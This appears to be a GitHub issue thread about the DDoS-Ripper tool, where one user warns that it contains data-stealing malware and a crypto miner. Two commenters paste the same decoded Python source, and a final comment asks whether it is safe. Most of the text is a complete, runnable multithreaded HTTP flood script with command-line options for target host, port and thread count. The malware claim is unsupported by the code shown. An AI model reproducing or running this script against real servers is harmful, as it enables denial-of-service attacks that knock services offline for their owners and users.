DDoS-Ripper icon indicating copy to clipboard operation
DDoS-Ripper copied to clipboard

DO NOT DOWNLOAD!

Open gmpro-4410 opened this issue 7 months ago • 1 comments

DDOS attack tool has a malware which can steal your data and its also a bitcoin miner so it will ruin your graphics card!!!!!!!!

gmpro-4410 avatar Jun 03 '25 20:06 gmpro-4410

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import sys
import time
import socket
import threading
import logging
import random
from queue import Queue
from optparse import OptionParser
import urllib.request

# Banner
print('''
💕💕💕💕💕💕💕💓 Rippers 💓💕💕💕💕💕💕
    ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
    Attack Script by Hammer
''')

# Global variables
host = ''
port = 80
turbo = 135
quiet = False
queue = Queue()

# Returns a list of common User-Agent strings
def build_user_agents():
    uas = []
    uas.append("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/72.0 Safari/537.36")
    uas.append("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36")
    uas.append("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 "
               "(KHTML, like Gecko) Version/12.1.1 Safari/605.1.15")
    # Add more UAs as needed
    return uas

# Sends a single HTTP GET request to the target
def down_it(item):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        ua = random.choice(build_user_agents())
        request = f"GET / HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {ua}\r\nAccept: */*\r\nConnection: close\r\n\r\n"
        s.send(request.encode('utf-8'))
        s.shutdown(socket.SHUT_WR)
        if not quiet:
            print(f"[+] Packet sent to {host}:{port}")
        s.close()
    except Exception as e:
        if not quiet:
            print(f"[-] Error sending packet: {e}")

# Worker thread function
def dos():
    while True:
        item = queue.get()
        down_it(item)
        queue.task_done()

# Alternative worker (unused)
def dos3():
    while True:
        item = queue.get()
        down_it(item)
        queue.task_done()

# Print usage instructions
def usage():
    print('''
Usage: python3 dripper.py -s <server> [-p <port>] [-t <threads>] [-q]
Options:
  -h, --help          Show this help message and exit
  -s, --server        Server IP or hostname (required)
  -p, --port          TCP port (default 80)
  -t, --turbo         Number of threads (default 135)
  -q, --quiet         Quiet mode (no output)
''')

# Parse command-line parameters
def get_parameters():
    global host, port, turbo, quiet
    parser = OptionParser()
    parser.add_option('-s', '--server', dest='host', help='Target server IP or hostname')
    parser.add_option('-p', '--port', dest='port', type='int', default=80,
                      help='Target port (default 80)')
    parser.add_option('-t', '--turbo', dest='turbo', type='int', default=135,
                      help='Number of threads (default 135)')
    parser.add_option('-q', '--quiet', dest='quiet', action='store_true', default=False,
                      help='Quiet mode (no print)')
    (options, args) = parser.parse_args()
    if not options.host:
        usage()
        sys.exit(1)
    host = options.host
    port = options.port
    turbo = options.turbo
    quiet = options.quiet

# Main function to start attack
def main():
    get_parameters()
    print(f"Starting attack on {host}:{port} with {turbo} threads.")
    for i in range(turbo):
        t = threading.Thread(target=dos)
        t.daemon = True
        t.start()
    try:
        # Fill the queue with dummy items
        for i in range(100000):
            queue.put(i)
        queue.join()
    except KeyboardInterrupt:
        print("\nAttack stopped by user.")
        sys.exit()

if __name__ == '__main__':
    main()

here is source code I have decoded

deanqkhanhcoder avatar Jul 04 '25 04:07 deanqkhanhcoder

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import sys
import time
import socket
import threading
import logging
import random
from queue import Queue
from optparse import OptionParser
import urllib.request

# Banner
print('''
💕💕💕💕💕💕💕💓 Rippers 💓💕💕💕💕💕💕
    ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
    Attack Script by Hammer
''')

# Global variables
host = ''
port = 80
turbo = 135
quiet = False
queue = Queue()

# Returns a list of common User-Agent strings
def build_user_agents():
    uas = []
    uas.append("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/72.0 Safari/537.36")
    uas.append("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36")
    uas.append("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 "
               "(KHTML, like Gecko) Version/12.1.1 Safari/605.1.15")
    # Add more UAs as needed
    return uas

# Sends a single HTTP GET request to the target
def down_it(item):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        ua = random.choice(build_user_agents())
        request = f"GET / HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {ua}\r\nAccept: */*\r\nConnection: close\r\n\r\n"
        s.send(request.encode('utf-8'))
        s.shutdown(socket.SHUT_WR)
        if not quiet:
            print(f"[+] Packet sent to {host}:{port}")
        s.close()
    except Exception as e:
        if not quiet:
            print(f"[-] Error sending packet: {e}")

# Worker thread function
def dos():
    while True:
        item = queue.get()
        down_it(item)
        queue.task_done()

# Alternative worker (unused)
def dos3():
    while True:
        item = queue.get()
        down_it(item)
        queue.task_done()

# Print usage instructions
def usage():
    print('''
Usage: python3 dripper.py -s <server> [-p <port>] [-t <threads>] [-q]
Options:
  -h, --help          Show this help message and exit
  -s, --server        Server IP or hostname (required)
  -p, --port          TCP port (default 80)
  -t, --turbo         Number of threads (default 135)
  -q, --quiet         Quiet mode (no output)
''')

# Parse command-line parameters
def get_parameters():
    global host, port, turbo, quiet
    parser = OptionParser()
    parser.add_option('-s', '--server', dest='host', help='Target server IP or hostname')
    parser.add_option('-p', '--port', dest='port', type='int', default=80,
                      help='Target port (default 80)')
    parser.add_option('-t', '--turbo', dest='turbo', type='int', default=135,
                      help='Number of threads (default 135)')
    parser.add_option('-q', '--quiet', dest='quiet', action='store_true', default=False,
                      help='Quiet mode (no print)')
    (options, args) = parser.parse_args()
    if not options.host:
        usage()
        sys.exit(1)
    host = options.host
    port = options.port
    turbo = options.turbo
    quiet = options.quiet

# Main function to start attack
def main():
    get_parameters()
    print(f"Starting attack on {host}:{port} with {turbo} threads.")
    for i in range(turbo):
        t = threading.Thread(target=dos)
        t.daemon = True
        t.start()
    try:
        # Fill the queue with dummy items
        for i in range(100000):
            queue.put(i)
        queue.join()
    except KeyboardInterrupt:
        print("\nAttack stopped by user.")
        sys.exit()

if __name__ == '__main__':
    main()

ecco il codice sorgente che ho decodificato

Jvideogamer avatar Dec 11 '25 16:12 Jvideogamer

ok , is it safe or not ?

Jvideogamer avatar Dec 11 '25 16:12 Jvideogamer